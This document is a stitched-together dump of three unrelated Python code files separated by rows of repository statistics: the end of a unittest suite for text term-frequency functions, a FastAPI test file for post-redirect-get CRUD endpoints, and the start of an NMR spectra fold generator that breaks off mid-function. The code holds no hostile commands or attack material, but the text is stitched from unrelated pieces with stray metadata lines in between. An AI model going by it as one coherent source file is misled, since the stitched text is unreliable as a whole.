1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0\
]),\
dtype=np.float32\
)
self.expected_c3grams_f_narray_largeVocab = np.array(
([
1.0, 1.0, 2.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0\
]),\
dtype=np.float32\
)
self.expected_c3grams_f_narray_smallVocab = np.array(
([
1.0, 1.0, 2.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 1.0,\
1.0,\
]),\
dtype=np.float32\
)
self.expected_words_f_narray_Vocab = np.array(
[ 0.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 ],\
dtype=np.float32\
)
self.expected_words_f_narray_smallVocab = np.array(
[ 0.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0 ],\
dtype=np.float32\
)
self.expected_words_f_narray_largeVocab = np.array(
[ 0.0, 1.0, 2.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0 ],\
dtype=np.float32\
)
self.expected_w3grams_f_narray_Vocab = np.array(
[ 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0 ],\
dtype=np.float32\
)
self.expected_w3grams_f_narray_smallVocab = np.array(
[ 0.0, 1.0, 1.0, 1.0, 1.0, 1.0 ],\
dtype=np.float32\
)
self.expected_w3grams_f_narray_largeVocab = np.array(
[ 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0 ],\
dtype=np.float32\
)
"""trms2tf_dict()"""
def test_trms2tf_dict_c3grams_NoVocab(self):
cngrams_tf_dict = trms2tfspd_dict( self.s2ngl_c3grams.terms_lst( self.txt_sample ), vocabulary=None )
print cngrams_tf_dict
self.assertEqual(cngrams_tf_dict, self.expected_c3grams_tf_dict)
"""
def test_trms2tf_dict_c3grams_Vocab(self):
cngrams_tf_dict = trms2tf_dict( self.s2ngl_c3grams.terms_lst( self.txt_sample ), vocabulary=self.c3grams_tid_vocab )
self.assertEqual(cngrams_tf_dict, self.expected_c3grams_tf_dict)
def test_trms2tf_dict_c3grams_smallVocab(self):
cngrams_tf_dict = trms2tf_dict( self.s2ngl_c3grams.terms_lst( self.txt_sample ), vocabulary=self.c3grams_tid_vocab_small )
self.assertEqual(cngrams_tf_dict, self.expected_c3grams_tf_dict_smallVocab)
def test_trms2tf_dict_c3grams_largeVocab(self):
cngrams_tf_dict = trms2tf_dict( self.s2ngl_c3grams.terms_lst( self.txt_sample ), vocabulary=self.c3grams_tid_vocab_large )
self.assertEqual(cngrams_tf_dict, self.expected_c3grams_tf_dict)
def test_trms2tf_dict_words_NoVocab(self):
words_tf_dict = trms2tf_dict( self.s2ngl_words.terms_lst( self.txt_sample ), vocabulary=None )
#Output excpected to be the same as in case of an input Vocabulary having same size (in terms) to the input terms-list.
self.assertEqual(words_tf_dict, self.expected_words_tf_dict)
def test_trms2tf_dict_words_Vocab(self):
cngrams_tf_dict = trms2tf_dict( self.s2ngl_words.terms_lst( self.txt_sample ), vocabulary=self.words_tid_vocab )
self.assertEqual(cngrams_tf_dict, self.expected_words_tf_dict)
def test_trms2tf_dict_words_smallVocab(self):
words_tf_dict = trms2tf_dict( self.s2ngl_words.terms_lst( self.txt_sample ), vocabulary=self.words_tid_vocab_small )
#Output excpected to be the smaller that the _Vocabe case since input Vocabulary has smaller size (in terms) than terms-list.
self.assertEqual(words_tf_dict, self.expected_words_tf_dict_smallVocab)
def test_trms2tf_dict_words_largeVocab(self):
words_tf_dict = trms2tf_dict( self.s2ngl_words.terms_lst( self.txt_sample ), vocabulary=self.words_tid_vocab_large )
#Output excpected to be the same as in case of an input Vocabulary having same size (in terms) to the input terms-list.
self.assertEqual(words_tf_dict, self.expected_words_tf_dict)
def test_trms2tf_dict_w3grams_NoVocab(self):
wngrams_tf_dict = trms2tf_dict( self.s2ngl_w3grams.terms_lst( self.txt_sample ), vocabulary=None )
#Output excpected to be the same as in case of an input Vocabulary having same size (in terms) to the input terms-list.
#Because, the input Vocabulary happess to have the same terms-order to the one returned by default in the case of 'Vocabulary = None'
self.assertEqual(wngrams_tf_dict, self.expected_w3grams_tf_dict)
def test_trms2tf_dict_w3grams_Vocab(self):
wngrams_tf_dict = trms2tf_dict( self.s2ngl_w3grams.terms_lst( self.txt_sample ), vocabulary=self.w3grams_tid_vocab )
self.assertEqual(wngrams_tf_dict, self.expected_w3grams_tf_dict)
def test_trms2tf_dict_w3grams_smallVocab(self):
wngrams_tf_dict = trms2tf_dict( self.s2ngl_w3grams.terms_lst( self.txt_sample ), vocabulary=self.w3grams_tid_vocab_small )
self.assertEqual(wngrams_tf_dict, self.expected_w3grams_tf_dict_smallVocab)
def test_trms2tf_dict_w3grams_largeVocab(self):
wngrams_tf_dict = trms2tf_dict( self.s2ngl_w3grams.terms_lst( self.txt_sample ), vocabulary=self.w3grams_tid_vocab_large )
#Output excpected to be the same as in case of an input Vocabulary having same size (in terms) to the input terms-list.
self.assertEqual(wngrams_tf_dict, self.expected_w3grams_tf_dict)
#trms2tf_narray()
def test_trms2tf_narray_c3grams_NoVocab(self):
cngrams_tf_arr = trms2tf_narray( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
vocabulary=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
self.assertTrue( np.all(cngrams_tf_arr == self.expected_c3grams_tf_arr) )
def test_trms2tf_narray_c3grams_Vocab(self):
cngrams_tf_arr = trms2tf_narray( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
vocabulary=self.c3grams_tid_vocab,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
#Output excpected to be the same as in case of an input Vocabulary is None.
#However, the order of terms will follow the one of input Vocabulary.
self.assertTrue( np.all(cngrams_tf_arr == self.expected_c3grams_tf_arr_Vocab) )
def test_trms2tf_narray_c3grams_smallVocab(self):
cngrams_tf_arr = trms2tf_narray( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
vocabulary=self.c3grams_tid_vocab_small,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
#Output excpected to be smaller than input terms Vocabulary having same size (in terms) to the input terms-list.
self.assertTrue( np.all(cngrams_tf_arr == self.expected_c3grams_tf_arr_smallVocab) )
def test_trms2tf_narray_c3grams_largeVocab(self):
cngrams_tf_arr = trms2tf_narray( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
vocabulary=self.c3grams_tid_vocab_large,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
#Output excpected to be the same as in case a Vocabulary is given, having the same terms as the ones into the terms-list.
#That is, the extra terms into the vocabulary will not be included into the output recored-array.
self.assertTrue( np.all(cngrams_tf_arr == self.expected_c3grams_tf_arr_Vocab) )
def test_trms2tf_narray_words_NoVocab(self):
words_tf_arr = trms2tf_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
self.assertTrue( np.all(words_tf_arr == self.expected_words_tf_arr) )
def test_trms2tf_narray_words_Vocab(self):
words_tf_arr = trms2tf_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
vocabulary=self.words_tid_vocab,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
self.assertTrue( np.all(words_tf_arr == self.expected_words_tf_arr_Vocab) )
def test_trms2tf_narray_words_smallVocab(self):
words_tf_arr = trms2tf_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
vocabulary=self.words_tid_vocab_small,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
self.assertTrue( np.all(words_tf_arr == self.expected_words_tf_arr_smallVocab) )
def test_trms2tf_narray_words_largeVocab(self):
words_tf_arr = trms2tf_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
vocabulary=self.words_tid_vocab_large,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
#Output excpected to be the same as in case a Vocabulary is given, having the same terms as the ones into the terms-list.
#That is, the extra terms into the vocabulary will not be included into the output recored-array.
self.assertTrue( np.all(words_tf_arr == self.expected_words_tf_arr_Vocab) )
def test_trms2tf_narray_w3grams_NoVocab(self):
w3grams_tf_arr = trms2tf_narray( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
self.assertTrue( np.all(w3grams_tf_arr == self.expected_w3grams_tf_arr) )
def test_trms2tf_narray_w3grams_Vocab(self):
w3grams_tf_arr = trms2tf_narray( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
vocabulary=self.w3grams_tid_vocab,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
self.assertTrue( np.all(w3grams_tf_arr == self.expected_w3grams_tf_arr_Vocab) )
def test_trms2tf_narray_w3grams_smallVocab(self):
w3grams_tf_arr = trms2tf_narray( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
vocabulary=self.w3grams_tid_vocab_small,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
self.assertTrue( np.all(w3grams_tf_arr == self.expected_w3grams_tf_arr_smallVocab) )
def test_trms2tf_narray_words_largeVocab(self):
words_tf_arr = trms2tf_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
vocabulary=self.words_tid_vocab_large,\
norm_func=None, ndtype=np.dtype([('terms', 'S128'), ('freq', 'float32')]))
#Output excpected to be the same as in case a Vocabulary is given, having the same terms as the ones into the terms-list.
#That is, the extra terms into the vocabulary will not be included into the output recored-array.
self.assertTrue( np.all(words_tf_arr == self.expected_words_tf_arr_Vocab) )
#trms2f_sparse()
def test_trms2f_sparse_c3grams_NoVocab(self):
with self.assertRaises(ValueError):
cngrams_f_sparse = trms2f_sparse( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=None, norm_func=None, ndtype=np.float32 )
def test_trms2f_sparse_c3grams_Vocab(self):
cngrams_f_sparse = trms2f_sparse( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.c3grams_tid_vocab, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(cngrams_f_sparse.toarray() == self.expected_c3grams_f_sparse_NoVocab.toarray()) )
def test_trms2f_sparse_c3grams_smallVocab(self):
cngrams_f_sparse = trms2f_sparse( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.c3grams_tid_vocab_small, norm_func=None, ndtype=np.float32 )
#Output excpected to be smaller in size than the input terms-list but same in size to the input Vocabulary.
self.assertTrue( np.all(cngrams_f_sparse.toarray() == self.expected_c3grams_f_sparse_smallVocab.toarray()) )
def test_trms2f_sparse_c3grams_largeVocab(self):
cngrams_f_sparse = trms2f_sparse( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.c3grams_tid_vocab_large, norm_func=None, ndtype=np.float32 )
#Output excpected to be larger in size than the input terms-list but same in size to the input Vocabulary.
#terms-poisition of terms not inlcuded in terms-list being setted to zero.
self.assertTrue( np.all(cngrams_f_sparse.toarray() == self.expected_c3grams_f_sparse_largeVocab.toarray()) )
def test_trms2f_sparse_words_NoVocab(self):
with self.assertRaises(ValueError):
words_f_sparse = trms2f_sparse( self.s2ngl_words.terms_lst( self.txt_sample ),\
tid_vocabulary=None, norm_func=None, ndtype=np.float32 )
def test_trms2f_sparse_words_Vocab(self):
words_f_sparse = trms2f_sparse( self.s2ngl_words.terms_lst( self.txt_sample ),\
tid_vocabulary=self.words_tid_vocab, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(words_f_sparse.toarray() == self.expected_words_f_sparse_Vocab.toarray()) )
def test_trms2f_sparse_words_smallVocab(self):
words_f_sparse = trms2f_sparse( self.s2ngl_words.terms_lst( self.txt_sample ),\
tid_vocabulary=self.words_tid_vocab_small, norm_func=None, ndtype=np.float32 )
#Output excpected to be smaller in size than the input terms-list but same in size to the input Vocabulary.
self.assertTrue( np.all(words_f_sparse.toarray() == self.expected_words_f_sparse_smallVocab.toarray()) )
def test_trms2f_sparse_words_largeVocab(self):
words_f_sparse = trms2f_sparse( self.s2ngl_words.terms_lst( self.txt_sample ),\
tid_vocabulary=self.words_tid_vocab_large, norm_func=None, ndtype=np.float32 )
#Output excpected to be larger in size than the input terms-list but same in size to the input Vocabulary.
#terms-poisition of terms not inlcuded in terms-list being setted to zero.
self.assertTrue( np.all(words_f_sparse.toarray() == self.expected_words_f_sparse_largeVocab.toarray()) )
def test_trms2f_sparse_w3grams_NoVocab(self):
with self.assertRaises(ValueError):
w3grams_f_sparse = trms2f_sparse( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=None, norm_func=None, ndtype=np.float32 )
def test_trms2f_sparse_w3grams_Vocab(self):
w3grams_f_sparse = trms2f_sparse( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.w3grams_tid_vocab, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(w3grams_f_sparse.toarray() == self.expected_w3grams_f_sparse_Vocab.toarray()) )
def test_trms2f_sparse_w3grams_smallVocab(self):
w3grams_f_sparse = trms2f_sparse( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.w3grams_tid_vocab_small, norm_func=None, ndtype=np.float32 )
#Output excpected to be smaller in size than the input terms-list but same in size to the input Vocabulary.
self.assertTrue( np.all(w3grams_f_sparse.toarray() == self.expected_w3grams_f_sparse_smallVocab.toarray()) )
def test_trms2f_sparse_w3grams_largeVocab(self):
w3grams_f_sparse = trms2f_sparse( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.w3grams_tid_vocab_large, norm_func=None, ndtype=np.float32 )
#Output excpected to be larger in size than the input terms-list but same in size to the input Vocabulary.
#terms-poisition of terms not inlcuded in terms-list being setted to zero.
self.assertTrue( np.all(w3grams_f_sparse.toarray() == self.expected_w3grams_f_sparse_largeVocab.toarray()) )
#trms2f_narray"
def test_trms2f_narray_c3grams_NoVocab(self):
with self.assertRaises(ValueError):
cngrams_f_narray = trms2f_narray( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=None, norm_func=None, ndtype=np.float32 )
def test_trms2f_narray_c3grams_Vocab(self):
cngrams_f_narray = trms2f_narray( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.c3grams_tid_vocab, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(cngrams_f_narray == self.expected_c3grams_f_narray_Vocab) )
def test_trms2f_narray_c3grams_smallVocab(self):
cngrams_f_narray = trms2f_narray( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.c3grams_tid_vocab_small, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(cngrams_f_narray == self.expected_c3grams_f_narray_smallVocab) )
def test_trms2f_narray_c3grams_largeVocab(self):
cngrams_f_narray = trms2f_narray( self.s2ngl_c3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.c3grams_tid_vocab_large, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(cngrams_f_narray == self.expected_c3grams_f_narray_largeVocab) )
def test_trms2f_narray_words_NoVocab(self):
with self.assertRaises(ValueError):
words_f_narray = trms2f_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
tid_vocabulary=None, norm_func=None, ndtype=np.float32 )
def test_trms2f_narray_words_Vocab(self):
words_f_narray = trms2f_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
tid_vocabulary=self.words_tid_vocab, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(words_f_narray == self.expected_words_f_narray_Vocab) )
def test_trms2f_narray_words_smallVocab(self):
words_f_narray = trms2f_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
tid_vocabulary=self.words_tid_vocab_small, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(words_f_narray == self.expected_words_f_narray_smallVocab) )
def test_trms2f_narray_words_largeVocab(self):
words_f_narray = trms2f_narray( self.s2ngl_words.terms_lst( self.txt_sample ),\
tid_vocabulary=self.words_tid_vocab_large, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(words_f_narray == self.expected_words_f_narray_largeVocab) )
def test_trms2f_narray_w3grams_NoVocab(self):
with self.assertRaises(ValueError):
w3grams_f_narray = trms2f_narray( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=None, norm_func=None, ndtype=np.float32 )
def test_trms2f_narray_w3grams_Vocab(self):
w3grams_f_narray = trms2f_narray( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.w3grams_tid_vocab, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(w3grams_f_narray == self.expected_w3grams_f_narray_Vocab) )
def test_trms2f_narray_w3grams_smallVocab(self):
w3grams_f_narray = trms2f_narray( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.w3grams_tid_vocab_small, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(w3grams_f_narray == self.expected_w3grams_f_narray_smallVocab) )
def test_trms2f_narray_w3grams_largeVocab(self):
w3grams_f_narray = trms2f_narray( self.s2ngl_w3grams.terms_lst( self.txt_sample ),\
tid_vocabulary=self.w3grams_tid_vocab_large, norm_func=None, ndtype=np.float32 )
self.assertTrue( np.all(w3grams_f_narray == self.expected_w3grams_f_narray_largeVocab) )
"""
suite = unittest.TestSuite()
suite.addTest( unittest.TestLoader().loadTestsFromTestCase(Test_BaseString2TF) )
unittest.TextTestRunner(verbosity=2).run(suite)
| 49.639759
| 141
| 0.544841
| 6,420
| 41,201
| 3.333178
| 0.057477
| 0.07019
| 0.069536
| 0.081125
| 0.91093
| 0.849245
| 0.820786
| 0.800598
| 0.761998
| 0.725361
| 0
| 0.104563
| 0.266498
| 41,201
| 829
| 142
| 49.699638
| 0.603521
| 0.012087
| 0
| 0.378453
| 0
| 0.002762
| 0.191134
| 0.041167
| 0
| 0
| 0
| 0
| 0.002762
| 0
| null | null | 0
| 0.019337
| null | null | 0.002762
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a1f296bc2c9b1b16cb83e06aa2967f255fe13c27
| 8,452
|
py
|
Python
|
tests/test_implementations/test_memory_sqlalchemy/api_async_test/test_post_redirect_get_api.py
|
aebrahim/FastAPIQuickCRUD
|
5c4d1bea2203c30eb21557f18bf9016b55fffa60
|
[
"MIT"
] | 123
|
2021-08-17T01:54:12.000Z
|
2022-03-29T20:41:56.000Z
|
tests/test_implementations/test_memory_sqlalchemy/api_async_test/test_post_redirect_get_api.py
|
aebrahim/FastAPIQuickCRUD
|
5c4d1bea2203c30eb21557f18bf9016b55fffa60
|
[
"MIT"
] | 10
|
2021-12-28T21:34:20.000Z
|
2022-03-16T13:31:24.000Z
|
tests/test_implementations/test_memory_sqlalchemy/api_async_test/test_post_redirect_get_api.py
|
aebrahim/FastAPIQuickCRUD
|
5c4d1bea2203c30eb21557f18bf9016b55fffa60
|
[
"MIT"
] | 10
|
2021-08-17T07:37:36.000Z
|
2022-03-31T13:16:55.000Z
|
import json
import uuid
from datetime import date, timedelta, datetime, timezone
from http import HTTPStatus
from starlette.testclient import TestClient
from src.fastapi_quickcrud import CrudMethods
from src.fastapi_quickcrud import crud_router_builder
from src.fastapi_quickcrud import sqlalchemy_to_pydantic
from tests.test_implementations.test_memory_sqlalchemy.api_test import app, UntitledTable256
UntitledTable256Model = sqlalchemy_to_pydantic(UntitledTable256,
crud_methods=[
CrudMethods.POST_REDIRECT_GET
],
exclude_columns=['bytea_value', 'xml_value', 'box_valaue'])
test_post_and_redirect_get = crud_router_builder(db_model=UntitledTable256,
crud_models=UntitledTable256Model,
prefix="/test_post_direct_get",
tags=["test"],
async_mode=True
)
UntitledTable256Model = sqlalchemy_to_pydantic(UntitledTable256,
crud_methods=[
CrudMethods.FIND_ONE
],
exclude_columns=['bytea_value', 'xml_value', 'box_valaue'])
test_get_data = crud_router_builder(db_model=UntitledTable256,
crud_models=UntitledTable256Model,
prefix="/test_post_direct_get",
tags=["test"],
async_mode=True
)
UntitledTable256Model = sqlalchemy_to_pydantic(UntitledTable256,
crud_methods=[
CrudMethods.POST_REDIRECT_GET
],
exclude_columns=['bytea_value', 'xml_value', 'box_valaue'])
test_post_and_redirect_get_without_get = crud_router_builder(db_model=UntitledTable256,
crud_models=UntitledTable256Model,
prefix="/test_post_direct_get_without_get",
tags=["test"],
async_mode=True
)
[app.include_router(i) for i in [test_post_and_redirect_get, test_get_data, test_post_and_redirect_get_without_get]]
client = TestClient(app)
primary_key_name = UntitledTable256.primary_key_of_table
unique_fields = UntitledTable256.unique_fields
# Post Redirect Get API Test
def test_create_one_but_no_follow_redirect():
headers = {
'accept': '*/*',
'Content-Type': 'application/json',
}
data = '{ "bool_value": true, "char_value": "string", "date_value": "2021-07-24", "float4_value": 0, "float8_value": 0, "int2_value": 0, "int4_value": 0, "int8_value": 0, "interval_value": 0, "json_value": {}, "jsonb_value": {}, "numeric_value": 0, "text_value": "string", "timestamp_value": "2021-07-24T02:54:53.285Z", "timestamptz_value": "2021-07-24T02:54:53.285Z", "uuid_value": "3fa85f64-5717-4562-b3fc-2c963f66afa6", "varchar_value": "string", "array_value": [ 0 ], "array_str__value": [ "string" ] }'
response = client.post('/test_post_direct_get', headers=headers, data=data, allow_redirects=False)
assert response.status_code == HTTPStatus.SEE_OTHER
def test_create_one_with_redirect():
headers = {
'accept': '*/*',
'Content-Type': 'application/json',
}
change = {}
bool_value_change = False
char_value_change = "test"
date_value_change = str(date.today() - timedelta(days=1))
float8_value_change = 0.1
int2_value_change = 100
int8_value_change = 100
interval_value_change = float(5400)
json_value_change = {"hello": "world"}
jsonb_value_change = {"hello": "world"}
numeric_value_change = 19.0
text_value_change = 'hello world'
time_value_change = '18:18:18'
timestamp_value_change = str(datetime.utcnow().isoformat())
timestamptz_value_change = str(datetime.utcnow().replace(tzinfo=timezone.utc).isoformat())
timetz_value_change = '18:18:18+00:00'
uuid_value_change = str(uuid.uuid4())
varchar_value_change = 'hello world'
array_value_change = [1, 2, 3, 4]
array_str__value_change = ['1', '2', '3', '4']
change['bool_value'] = bool_value_change
change['char_value'] = char_value_change
change['date_value'] = date_value_change
change['float8_value'] = float8_value_change
change['int2_value'] = int2_value_change
change['int8_value'] = int8_value_change
change['float4_value'] = 0.4
change['int4_value'] = 4
change['interval_value'] = interval_value_change
change['json_value'] = json_value_change
change['jsonb_value'] = jsonb_value_change
change['numeric_value'] = numeric_value_change
change['text_value'] = text_value_change
change['time_value'] = time_value_change
change['timestamp_value'] = timestamp_value_change
change['timestamptz_value'] = timestamptz_value_change
change['timetz_value'] = timetz_value_change
change['uuid_value'] = uuid_value_change
change['varchar_value'] = varchar_value_change
change['array_value'] = array_value_change
change['array_str__value'] = array_str__value_change
data_ = json.dumps(change)
response = client.post('/test_post_direct_get', headers=headers, data=data_, allow_redirects=True)
assert response.status_code == HTTPStatus.OK
response_data = response.json()
assert primary_key_name in response_data
return response_data
def test_create_but_conflict():
data = test_create_one_with_redirect()
headers = {
'accept': '*/*',
'Content-Type': 'application/json',
}
response = client.post('/test_post_direct_get', headers=headers, data=json.dumps(data), allow_redirects=True)
assert response.status_code == HTTPStatus.CONFLICT
def test_create_but_not_found_get_api():
change = {}
bool_value_change = False
char_value_change = "test"
date_value_change = str(date.today() - timedelta(days=1))
float8_value_change = 0.1
int2_value_change = 100
int8_value_change = 100
interval_value_change = float(5400)
json_value_change = {"hello": "world"}
jsonb_value_change = {"hello": "world"}
numeric_value_change = 19
text_value_change = 'hello world'
time_value_change = '18:18:18'
timestamp_value_change = str(datetime.utcnow().isoformat())
timestamptz_value_change = str(datetime.utcnow().replace(tzinfo=timezone.utc).isoformat())
timetz_value_change = '18:18:18+00:00'
uuid_value_change = str(uuid.uuid4())
varchar_value_change = 'hello world'
array_value_change = [1, 2, 3, 4]
array_str__value_change = ['1', '2', '3', '4']
change['bool_value'] = bool_value_change
change['char_value'] = char_value_change
change['date_value'] = date_value_change
change['float8_value'] = float8_value_change
change['int2_value'] = int2_value_change
change['int8_value'] = int8_value_change
change['float4_value'] = 0.4
change['int4_value'] = 4
change['interval_value'] = interval_value_change
change['json_value'] = json_value_change
change['jsonb_value'] = jsonb_value_change
change['numeric_value'] = numeric_value_change
change['text_value'] = text_value_change
change['time_value'] = time_value_change
change['timestamp_value'] = timestamp_value_change
change['timestamptz_value'] = timestamptz_value_change
change['timetz_value'] = timetz_value_change
change['uuid_value'] = uuid_value_change
change['varchar_value'] = varchar_value_change
change['array_value'] = array_value_change
change['array_str__value'] = array_str__value_change
data = json.dumps(change)
headers = {
'accept': '*/*',
'Content-Type': 'application/json',
}
response = client.post('/test_post_direct_get_without_get', headers=headers, data=data, allow_redirects=True)
assert response.status_code == HTTPStatus.NOT_FOUND
| 43.122449
| 511
| 0.635353
| 942
| 8,452
| 5.301486
| 0.154989
| 0.167401
| 0.122547
| 0.03364
| 0.817381
| 0.788747
| 0.781137
| 0.754305
| 0.754305
| 0.734081
| 0
| 0.036847
| 0.261477
| 8,452
| 195
| 512
| 43.34359
| 0.763217
| 0.003076
| 0
| 0.717791
| 0
| 0.006135
| 0.184635
| 0.031346
| 0
| 0
| 0
| 0
| 0.030675
| 1
| 0.02454
| false
| 0
| 0.055215
| 0
| 0.08589
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b821f79b42df0a7d7e510fc1784ba397079fd985
| 18,563
|
py
|
Python
|
train_with_your_data/scripts/cpmg/automated_metabolite_quantification/data_generators.py
|
ciceklab/targeted_brain_tumor_margin_assessment
|
2cf729019dfc1785992208a69c353a659c9b6448
|
[
"MIT"
] | 1
|
2021-12-11T20:06:39.000Z
|
2021-12-11T20:06:39.000Z
|
train_with_your_data/scripts/cpmg/automated_metabolite_quantification/data_generators.py
|
ciceklab/targeted_brain_tumor_margin_assessment
|
2cf729019dfc1785992208a69c353a659c9b6448
|
[
"MIT"
] | null | null | null |
train_with_your_data/scripts/cpmg/automated_metabolite_quantification/data_generators.py
|
ciceklab/targeted_brain_tumor_margin_assessment
|
2cf729019dfc1785992208a69c353a659c9b6448
|
[
"MIT"
] | 2
|
2021-12-15T18:17:17.000Z
|
2021-12-16T12:08:30.000Z
|
import pdb
import pickle
import pandas as pd
import os
import numpy as np
import sys
sys.path.insert(1,"../")
sys.path.insert(1,"../../")
sys.path.insert(1,"../../../")
from config_u import base
project_base_path = base
current_path = "scripts/cpmg/automated_metabolite_quantification/"
sys.path.insert(1, os.path.join(project_base_path, current_path))
from data_utils import split_to_kfold, spectrum2ppm, spectrum_peak_unit_quantification
''' Custom data generator functions for fold generation with no patient and sample overlap'''
# Option #1.A: only valid PC and fully quantified samples (train, vald and test)
def cpmg_generator_1A(k, fold_dct, statistics, spectra, ppm_spectra, quant, class_labels):
cur_iter = 0
while cur_iter < k:
test_fold_idx = fold_dct[str(cur_iter)]
test_fold = {}
